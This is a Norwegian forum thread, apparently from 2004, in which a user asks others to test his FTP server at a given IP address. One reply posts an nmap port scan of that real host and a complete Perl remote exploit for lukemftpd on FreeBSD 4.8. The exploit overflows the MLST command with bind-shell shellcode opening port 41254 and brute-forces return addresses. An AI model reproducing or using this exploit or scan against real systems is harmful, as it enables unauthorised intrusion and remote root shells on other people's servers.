Gå til innhold
Trenger du hjelp med internett og nettverk? Still spørsmål her ×

Kan noen teste dette, please!


Anbefalte innlegg

Videoannonse
Annonse
virker som bare pokker den:

WinSock 2.0
Connecting to 213.115.19.109
Connected to 213.115.19.109 Port 21
220 Serv-U FTP Server v4.0 for WinSock ready...
USER anonymous
331 User name okay, please send complete E-mail address as password
CWD Insane games videos
250 Directory changed to /Insane games videos
PWD
257 "/Insane games videos" is current directory.
List (cached)
List Complete.
TYPE I
200 Type set to I.
PASV
227 Entering Passive Mode (213,115,19,109,4,63)
RETR insane.mpeg
150 Opening BINARY mode data connection for insane.mpeg (16121860 bytes).
226 Transfer complete.
Transferred: insane.mpeg 16,121,860 bytes in 01:42 (153.30 KBps)
Transfer queue completed
Transferred 1 file totaling 16,121,860 bytes in 01:43 (153.30 KBps)
Lenke til kommentar
selvfølgelig kan du se ipene:) hvilken linje er du på egentlig?

du må sette max login per user slik at ikke en person kan ta over hele

ftpen din ved å logge inn flere ganger samtidig og dermed få hele

hastigheten for seg selv.

hvordan er det mulig da? ha hele linje for seg selv, han kan jo ikke laste ned raskere enn maks hastigheten hans uansett, og jeg har uendelig med downloads til alle, så ingen farer der, alt blir delt lik uansett.

Lenke til kommentar

men du har ikke uendelig hastighet, så om jeg sitter på en superkjapp

linje, og du har det nyeste barbie soundtracket som jeg bare mååå ha,

så kan jeg logge meg på 30 ganger for å laste ned 30 filer samtidig.

om en person da laster ned med bare en login, så vil jeg kunne laste

ned 30 ganger kjappere enn han med en login. dette gjelder bare om

din speed blir makset ut.

det er veldig lett å sette dette opp i serve-U.

Endret av capy
Lenke til kommentar

lukemftp 1.5

 

>nmap 213.115.19.109

 

Starting nmap 3.46 ( http://www.insecure.org/nmap/ ) at 2004-01-24 12:07 CET

Interesting ports on c-6d1373d5.04-30-6f736c3.cust.bredband.no (213.115.19.109):

(The 1646 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE

21/tcp open ftp

111/tcp filtered rpcbind

135/tcp filtered msrpc

136/tcp filtered profile

137/tcp filtered netbios-ns

138/tcp filtered netbios-dgm

139/tcp filtered netbios-ssn

445/tcp filtered microsoft-ds

635/tcp filtered unknown

1025/tcp open NFS-or-IIS

5000/tcp open UPnP

 

EDIT: exploits for lukemftp, rape my ftpserver

#!/usr/bin/perl

#realpath lukemftpd remote exploit for freeBSD 4.8
#i managed to code this, and lose the first copy, hence a re-write :(
#deadbeat,
#left without any return addresses/offsets purposely to stop kids using it..
#want the rets/offsets? heh..
#
#tested on freeBSD 4.8 and it worked;) it worked;)
#e: [email protected]
#e: [email protected]

use IO::Socket;

$user = $ARGV[0];
$pass = $ARGV[1];
$ret = $ARGV[2];
$offset = $ARGV[3];
$host = $ARGV[4];
$buf= 1024;
$n = "./";
print "lukemftpd remote for FreeBSD 4.8 ..\n";
print "this is the kiddiot version, go grab them ret's+offsets..lool\n";
print "contact me and i might give u the rets/offsets\n";
if(!$ARGV[4]){
die "Usage: perl $0 <user> <pass> <ret> <offset> <host>\n";
}
sub brute_force
{
$r = $_[0];
$o = $_[1];

#shellcode from zillion.. from safemode.org...binds /bin/sh on 41254
$hell ="\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0".
       "\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46".
       "\x0a\xa1\x26\x89\x46\x0c\x6a\x10\x8d\x46\x08\x50\x52\x31\xc0".
       "\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd\x80".
       "\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff".
       "\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01".
       "\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff".
       "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23";

$addr = pack('l', ($r+$o));
for($i=0;$i <$buf; $i +=4){
$buffer .=$addr;
}
for($i=0;$i<$buf - length($hell) /2;$i++){
$buffer .=$n;
}
$buffer .=$hell;

print "Connecting to: $host\n";
$sox = IO::Socket::INET->new(
Proto=>"tcp",
PeerPort=>"21",
PeerAddr=>"$host"
)or die "cant connect to $host ...maybe try a real host;)\n";
sleep 1;
print ("[+]Trying addr: 0x", sprintf('%lx', ($r + $o)),"\n");
print $sox "user $user\r\n";
sleep 1;
print "pass $pass\r\n";
sleep 1;
print $sox "MLST $buffer\r\n";
sleep 2;
close $sox;
print "Trying to connect to r00tshell\n";
$sox = IO::Socket::INET->new(
Proto=>"tcp",
PeerPort=>"41254",
PeerAddr=>"$host"
)or die"No r00tshell this time, try using a proper offset/ret_addr..\n";
print "Wicked we got a r00tshell on $host : 41254\n\n";
close $sox;
}

for($a=0;$a<1000;$a++){
$offset++;
$reta = pack('l', ($ret+$o));
print "Brute Force [$a]\n";
brute_force($reta,$offset);
}

Endret av DrDoogie
Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
  • Hvem er aktive   0 medlemmer

    • Ingen innloggede medlemmer aktive
×
×
  • Opprett ny...